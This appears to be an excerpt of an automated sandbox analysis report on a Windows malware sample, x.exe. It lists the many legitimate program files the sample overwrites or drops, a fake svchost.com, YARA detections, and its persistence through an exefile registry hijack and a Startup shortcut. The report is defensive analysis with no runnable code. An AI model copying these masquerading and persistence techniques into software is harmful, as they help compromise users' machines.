                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\ProgramData\Java Update Checker (64 bit).exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile created: C:\ProgramData\Java Update Checker (64 bit).exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Windows\svchost.comJump to dropped file

Boot Survival

Source: Yara match | File source: x.exe, type: SAMPLE
Source: Yara match | File source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
Source: Yara match | File source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
Source: C:\Users\user\Desktop\x.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
Source: C:\Users\user\Desktop\x.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk
Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk

Hooking and other Techniques for Hiding and Protection

                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
